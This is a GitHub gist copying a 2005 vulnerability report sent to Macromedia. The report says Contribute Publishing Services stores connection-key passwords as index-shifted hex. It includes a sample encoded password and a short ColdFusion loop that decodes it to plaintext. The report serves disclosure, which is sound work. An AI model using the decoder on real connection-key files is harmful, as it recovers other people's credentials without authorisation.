Created
November 11, 2013 02:20
-
-
Save umbrae/7406742 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| From: umbrae@gmail.com [mailto:umbrae@gmail.com] | |
| Sent: Friday, August 26, 2005 8:05 AM | |
| To: Secure@macromedia.com | |
| Subject: [Security Issue] [The encryption algorithm] | |
| The following information was submitted on the Security Issue Report | |
| Form : | |
| Name: Umbrae | |
| Company : | |
| Email Address: umbrae@gmail.com <mailto:umbrae@gmail.com> | |
| Voice Phone : | |
| Products: Contribute Publishing Services | |
| Platform: linux | |
| HTTPREFERRER: http://www.macromedia.com/support/email/security/main.cgi | |
| Security Issue Report: | |
| The encryption algorithm for password hashing in connection keys | |
| provided by contribute publishing services is very weak. | |
| For example, from a test connection_key.stc: | |
| pw="7970757466797A" | |
| One can easily see that its hex, and when you convert it into its ascii | |
| equivalent, you see that each hex letter is +index off of what it should | |
| be. So a 'crack' can easily be made: | |
| <cfset thestr="79,70,77,75,74,66,79,7A" /> | |
| <cfset count=0> | |
| <cfloop list="#thestr#" index="i"> | |
| <cfoutput> | |
| #InputBaseN(i,16)-count# | |
| #chr(InputBaseN(i,16)-count)# | |
| <br> | |
| <cfset count = count+1 /> | |
| </cfoutput> | |
| </cfloop> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment